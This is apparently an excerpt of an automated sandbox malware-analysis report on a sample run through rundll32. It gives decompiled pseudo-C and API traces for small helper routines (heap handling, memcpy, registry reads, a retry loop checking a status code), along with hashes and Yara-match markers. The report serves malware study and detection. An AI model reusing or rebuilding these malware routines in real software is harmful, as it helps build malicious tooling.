                                                          • Instruction ID: f14e687a160e2b1bda5ea7b2e5fe56619ee4ceda536f56e10db4d7bee224ec15
                                                          • Opcode Fuzzy Hash: cd304c51990325510a59fc19587624974d3a643c62f440f50f528dec7383a471
                                                          • Instruction Fuzzy Hash: 0021AE32E20206AFDBA0EF99C890E6E77E5EF48394768852DED458B150D670FD01DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D375F Relevance: 1.6, APIs: 1, Instructions: 70synchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D375F(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
				intOrPtr _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v60;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				signed int* _t16;
				signed int _t25;
				signed int _t26;
				signed int* _t28;
				signed int _t30;

				_t28 = __ecx;
				_t14 =  *0x36da368; // 0x5969618
				_v12 = _t14;
				_t16 = _a12;
				_t30 = 8;
				if(_t16 != 0) {
					 *_t16 =  *_t16 & 0x00000000;
				}
				do {
					_t31 =  &_v68;
					if(E036D227F( &_v68) == 0) {
						goto L16;
					}
					_t30 = E036D6954(_t31, _a4, _v12);
					if(_t30 == 0) {
						_t25 = E036D1CA5(_t31, _t28); // executed
						_t30 = _t25;
						if(_t30 != 0) {
							if(_t30 == 0x102) {
								E036DA000 = E036DA000 + 0xea60;
							}
						} else {
							if(_v24 != 0xc8) {
								_t30 = 0xe8;
							} else {
								_t26 = _v20;
								if(_t26 == 0) {
									_t30 = 0x10d2;
								} else {
									_t28 = _a8;
									if(_t28 != 0) {
										_v60 = _v60 & _t30;
										 *_t28 = _v60;
										_t28 = _a12;
										if(_t28 != 0) {
											 *_t28 = _t26;
										}
									}
								}
							}
						}
					}
					E036D4274( &_v68, 0x102, _t28, _t30);
					L16:
				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x36da30c, 0) == 0x102);
				return _t30;
			}

















                                                          0x036d375f
                                                          0x036d3765
                                                          0x036d376c
                                                          0x036d3774
                                                          0x036d377a
                                                          0x036d377d
                                                          0x036d377f
                                                          0x036d377f
                                                          0x036d3787
                                                          0x036d3787
                                                          0x036d3791
                                                          0x00000000
                                                          0x00000000
                                                          0x036d37a0
                                                          0x036d37a4
                                                          0x036d37a8
                                                          0x036d37ad
                                                          0x036d37b1
                                                          0x036d37ed
                                                          0x036d37ef
                                                          0x036d37ef
                                                          0x036d37b3
                                                          0x036d37ba
                                                          0x036d37e4
                                                          0x036d37bc
                                                          0x036d37bc
                                                          0x036d37c1
                                                          0x036d37dd
                                                          0x036d37c3
                                                          0x036d37c3
                                                          0x036d37c8
                                                          0x036d37cd
                                                          0x036d37d0
                                                          0x036d37d2
                                                          0x036d37d7
                                                          0x036d37d9
                                                          0x036d37d9
                                                          0x036d37d7
                                                          0x036d37c8
                                                          0x036d37c1
                                                          0x036d37ba
                                                          0x036d37b1
                                                          0x036d37fc
                                                          0x036d3801
                                                          0x036d3801
                                                          0x036d3825

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(00000000,76CC81D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 036D3811
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 24740636-0
                                                          • Opcode ID: cff092893e6824a440529ffd6b5a0b48b66d512964bbb713b25f341a0d256057
                                                          • Instruction ID: 73703faded027dd1180f1bf0db5a3f5345bcf46100b6456899ad48ffca57c767
                                                          • Opcode Fuzzy Hash: cff092893e6824a440529ffd6b5a0b48b66d512964bbb713b25f341a0d256057
                                                          • Instruction Fuzzy Hash: A721C0BEF017459BDF11DE9AE984A6E77B5BB81350F28403AE501DB344DB70D801CB5A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D1B6F Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 34%
                                                          			E036D1B6F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x36da348; // 0x228d5a8
				_t4 = _t15 + 0x36db3a0; // 0x5968948
				_t20 = _t4;
				_t6 = _t15 + 0x36db124; // 0x650047
				_t17 = E036D46CB(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E036D59AE(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                                          0x036d1b79
                                                          0x036d1b80
                                                          0x036d1b81
                                                          0x036d1b82
                                                          0x036d1b83
                                                          0x036d1b89
                                                          0x036d1b8e
                                                          0x036d1b8e
                                                          0x036d1b98
                                                          0x036d1baa
                                                          0x036d1bb1
                                                          0x036d1bdf
                                                          0x036d1bb3
                                                          0x036d1bb5
                                                          0x036d1bba
                                                          0x036d1bdc
                                                          0x036d1bbc
                                                          0x036d1bbf
                                                          0x036d1bc6
                                                          0x036d1bcb
                                                          0x036d1bcd
                                                          0x036d1bcd
                                                          0x036d1bd2
                                                          0x036d1bd2
                                                          0x036d1bba
                                                          0x036d1be6

                                                          APIs
                                                            • Part of subcall function 036D46CB: SysFreeString.OLEAUT32(?), ref: 036D47AA
                                                            • Part of subcall function 036D59AE: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,036D5EFA,004F0053,00000000,?), ref: 036D59B7
                                                            • Part of subcall function 036D59AE: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,036D5EFA,004F0053,00000000,?), ref: 036D59E1
                                                            • Part of subcall function 036D59AE: memset.NTDLL ref: 036D59F5
                                                          • SysFreeString.OLEAUT32(00000000), ref: 036D1BD2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeString$lstrlenmemcpymemset
                                                          • String ID:
                                                          • API String ID: 397948122-0
                                                          • Opcode ID: ffed562d6e0bfe4551f53296b2f9e8ad8f4767dea0f647a070afec6427686086
                                                          • Instruction ID: 56676e3ee37f4478ebae2843a983228665c610088762b150855f729b01001a66
                                                          • Opcode Fuzzy Hash: ffed562d6e0bfe4551f53296b2f9e8ad8f4767dea0f647a070afec6427686086
                                                          • Instruction Fuzzy Hash: 18017C36900129BFDF51EFA9DD01DAABBB9FB49650F010569EA02E7160E7B09922C790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D2E4E Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 89%
                                                          			E036D2E4E(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E036D1C03(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x36da348; // 0x228d5a8
						_t9 = _t17 + 0x36dba40; // 0x444f4340
						_t20 = E036D3B58( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x36da2d8, 0, _a4); // executed
					}
				}
				return _t26;
			}








                                                          0x036d2e51
                                                          0x036d2e57
                                                          0x036d2eae
                                                          0x036d2e5d
                                                          0x036d2e68
                                                          0x036d2e6d
                                                          0x036d2e71
                                                          0x036d2e7e
                                                          0x036d2e86
                                                          0x036d2e92
                                                          0x036d2e9a
                                                          0x036d2ea4
                                                          0x036d2ea4
                                                          0x036d2e71
                                                          0x036d2eb3

                                                          APIs
                                                            • Part of subcall function 036D1C03: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 036D1C1B
                                                            • Part of subcall function 036D3B58: lstrlen.KERNEL32(76CDF710,?,00000000,?,76CDF710), ref: 036D3B8C
                                                            • Part of subcall function 036D3B58: StrStrA.SHLWAPI(00000000,?), ref: 036D3B99
                                                            • Part of subcall function 036D3B58: RtlAllocateHeap.NTDLL(00000000,?), ref: 036D3BB8
                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,036D553D), ref: 036D2EA4
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Allocate$Freelstrlen
                                                          • String ID:
                                                          • API String ID: 2220322926-0
                                                          • Opcode ID: e38096258b4a2e84f9e9eda6f377e038ee023b7206f2c6e91ca693bf621a3615
                                                          • Instruction ID: f73ca88393e7da283a84a7b00f1ac2489cdd9238c755f63052bb72811a745f70
                                                          • Opcode Fuzzy Hash: e38096258b4a2e84f9e9eda6f377e038ee023b7206f2c6e91ca693bf621a3615
                                                          • Instruction Fuzzy Hash: F701A476500608FFCB21DF44DC00EAABBF9EB48340F144029FA05C7268E771EA55EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06293083 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 06293090
                                                            • Part of subcall function 062931E3: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,000260DC,06270000), ref: 0629325C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionHelper2@8LoadRaise___delay
                                                          • String ID:
                                                          • API String ID: 123106877-0
                                                          • Opcode ID: c9649fa4e249f55a1e38eedf8ba31624d8c0adcba604ae14b17e776ccd4530a9
                                                          • Instruction ID: ae039701989c8d0079a6432c4ccfe904b284c876123889c8ab31ede094326f7d
                                                          • Opcode Fuzzy Hash: c9649fa4e249f55a1e38eedf8ba31624d8c0adcba604ae14b17e776ccd4530a9
                                                          • Instruction Fuzzy Hash: 96A001962B9601BD3BE8A2516D87C3B169CD6E1A223208A2EFC2294050A8C35E8900B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0629309E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 06293090
                                                            • Part of subcall function 062931E3: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,000260DC,06270000), ref: 0629325C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionHelper2@8LoadRaise___delay
                                                          • String ID:
                                                          • API String ID: 123106877-0
                                                          • Opcode ID: 0458ad9e0bb870e441879038194a83a691b8f06006803c0456c94693c384dfae
                                                          • Instruction ID: d26ace2bc81afc434034a9b9ac368f7b3755bb49d85255fb6f350ab2874bea42
                                                          • Opcode Fuzzy Hash: 0458ad9e0bb870e441879038194a83a691b8f06006803c0456c94693c384dfae
                                                          • Instruction Fuzzy Hash: 2EA001962B9202BD3BD8A2516D87C3B169CD6C5A613208D2EEC2284050A8C35E8900B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D6D63 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D6D63(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x36da2d8, 0, _a4); // executed
				return _t2;
			}




                                                          0x036d6d6f
                                                          0x036d6d75

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: b3fd2b881123f03a4daf9992ab3a036caac26b7cb8a8dd130e3e7dcfaadc8c0a
                                                          • Instruction ID: fa14f844f02c862e0f8a0f24de79bd1cf25e343d133ee38c56365670eb9a2448
                                                          • Opcode Fuzzy Hash: b3fd2b881123f03a4daf9992ab3a036caac26b7cb8a8dd130e3e7dcfaadc8c0a
                                                          • Instruction Fuzzy Hash: 0CB01231805200ABCF016F41FD08F057B61BB90700F045014B2088007C83330470FB08
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D6C2C Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D6C2C(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x36da2d8, 0, _a4); // executed
				return _t2;
			}




                                                          0x036d6c38
                                                          0x036d6c3e

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 8cfb79287d6921752eae8e71c27fc75fcdc45a68263e5745e310dbe4066ad72f
                                                          • Instruction ID: 2935100abf8e2c2d01c0ab0b098571bf93c537754099d5621233f0bb1f23a59f
                                                          • Opcode Fuzzy Hash: 8cfb79287d6921752eae8e71c27fc75fcdc45a68263e5745e310dbe4066ad72f
                                                          • Instruction Fuzzy Hash: DDB01271905200ABCF116B41FE04F057A61AB90700F045014B3049007C83320430FB19
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06279394 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 6c718772c40f38211285d1a7882b29d00288d3b6c6cde8ab4adf9a9226c8de15
                                                          • Instruction ID: 2a50a735b23c7111863a2d1e14fde9a98b0faf5100b415977a09a699883a3b05
                                                          • Opcode Fuzzy Hash: 6c718772c40f38211285d1a7882b29d00288d3b6c6cde8ab4adf9a9226c8de15
                                                          • Instruction Fuzzy Hash: A7B01271200300ABCB024F01FE0DF057B23A7D4700F004010B30C5406082310424FF24
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628E803 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 0e478a6c38cc95b63d198cb703dde4e861fcc1f17b267a581ccac913bcdbdff0
                                                          • Instruction ID: 812802d72c0a752fa9fe6cb3271ea46af24650150b4afbabf2bf2a73f9c27905
                                                          • Opcode Fuzzy Hash: 0e478a6c38cc95b63d198cb703dde4e861fcc1f17b267a581ccac913bcdbdff0
                                                          • Instruction Fuzzy Hash: E3B01231100300ABCB024F00FD0EF057B23ABD4700F004410B30C9006082310468FF24
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D13C7 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D13C7(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					_t37 = E036D6FD0(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E036D6D63(_t53);
						_v8 = _t51;
						_t73 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E036D6C2C(_v8);
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E036D6EE7(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;
							goto L18;
						}
					}
					_t58 =  &_v144;
					_t42 = E036D5FBB(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}























                                                          0x036d13d2
                                                          0x036d13d5
                                                          0x036d13dc
                                                          0x036d13df
                                                          0x036d13e2
                                                          0x036d13e7
                                                          0x036d14e3
                                                          0x036d14e7
                                                          0x036d13f9
                                                          0x036d1405
                                                          0x036d140c
                                                          0x036d1413
                                                          0x00000000
                                                          0x00000000
                                                          0x036d1419
                                                          0x036d1421
                                                          0x00000000
                                                          0x00000000
                                                          0x036d1427
                                                          0x036d1430
                                                          0x036d1434
                                                          0x00000000
                                                          0x00000000
                                                          0x036d1436
                                                          0x036d143d
                                                          0x036d1442
                                                          0x036d1445
                                                          0x036d1447
                                                          0x036d14c8
                                                          0x036d14cf
                                                          0x036d14d1
                                                          0x00000000
                                                          0x00000000
                                                          0x036d14d3
                                                          0x036d14d7
                                                          0x036d14dc
                                                          0x036d14dc
                                                          0x00000000
                                                          0x036d14d7
                                                          0x036d144e
                                                          0x036d1456
                                                          0x036d1456
                                                          0x036d145f
                                                          0x036d146d
                                                          0x036d14c4
                                                          0x036d14c4
                                                          0x00000000
                                                          0x036d1490
                                                          0x036d1493
                                                          0x00000000
                                                          0x036d1493
                                                          0x036d146d
                                                          0x036d14a2
                                                          0x036d14b0
                                                          0x036d14b5
                                                          0x036d14b7
                                                          0x036d14cc
                                                          0x00000000
                                                          0x036d14cc
                                                          0x036d14b9
                                                          0x036d14bf
                                                          0x036d14c2
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d14c2

                                                          APIs
                                                          • memcpy.NTDLL(00000000,?,?,?,?,?,00000001,?,?,?), ref: 036D144E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID:
                                                          • API String ID: 3510742995-0
                                                          • Opcode ID: c648886f1a2ec85e852e477e5d42c8655359d0f0dd47989d6feb885f83cc499d
                                                          • Instruction ID: fd4920c61e9fb45d3d2074d7e8ce38b7483c8cc352f6f949603e0c110e176619
                                                          • Opcode Fuzzy Hash: c648886f1a2ec85e852e477e5d42c8655359d0f0dd47989d6feb885f83cc499d
                                                          • Instruction Fuzzy Hash: A2312F75D00219EFDF61DF94C980BEEB7B9BB06204F1444A9E509E7281D6709E49CB70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628FD24 Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 06291ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F02
                                                            • Part of subcall function 06291ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 06291F16
                                                            • Part of subcall function 06291ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F30
                                                            • Part of subcall function 06291ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,06272C89,?,?,?), ref: 06291F5A
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,76CDF710,00000000,00000000,?,?,?,0627E30A,?), ref: 0628FDB6
                                                            • Part of subcall function 0628AF83: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,?,062763CD,00000000,00000001,-00000007,?,00000000), ref: 0628AFA6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HeapQueryValue$AllocateCloseFreememcpy
                                                          • String ID:
                                                          • API String ID: 1301464996-0
                                                          • Opcode ID: 07d43bc317252f5fcf59a7c22f363c5973b2b43618303dcb2d532f43c7603513
                                                          • Instruction ID: a5b4175247a0bcd7ec6e77f86c0207d59be9a649ed1dfdd4e92109a77881fbb2
                                                          • Opcode Fuzzy Hash: 07d43bc317252f5fcf59a7c22f363c5973b2b43618303dcb2d532f43c7603513
                                                          • Instruction Fuzzy Hash: 6A11A772A31301AFDB95EB59DD84EAD77A9EF88390F100029EF01DB281D7B59D10CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06282BFD Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memcpy.NTDLL(?,0629A324,00000018,06286FFC,06898E36,?,06286FFC,06898E36,?,06286FFC,06898E36,?,?,?,?,06286FFC), ref: 06282CB2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID:
                                                          • API String ID: 3510742995-0
                                                          • Opcode ID: 0868403b3672842e070397ac6809be7f8e549b90963a29ea38e88d8712355264
                                                          • Instruction ID: 38ed3ebaf0013a66e6650aa5bd3d68ab0a5a4d98594db974ebd9c53f25b0d21e
                                                          • Opcode Fuzzy Hash: 0868403b3672842e070397ac6809be7f8e549b90963a29ea38e88d8712355264
                                                          • Instruction Fuzzy Hash: A5112171A11305AFCB94EF66FC49CE637AAEBC53117458126EE188B291DB309511CFB8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627708F Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 06291ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F02
                                                            • Part of subcall function 06291ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 06291F16
                                                            • Part of subcall function 06291ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F30
                                                            • Part of subcall function 06291ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,06272C89,?,?,?), ref: 06291F5A
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 06277100
                                                            • Part of subcall function 06274963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,062770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 06274975
                                                            • Part of subcall function 06274963: StrChrA.SHLWAPI(?,00000020,?,00000000,062770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 06274984
                                                            • Part of subcall function 0627EE04: CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 0627EE2A
                                                            • Part of subcall function 0627EE04: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0627EE36
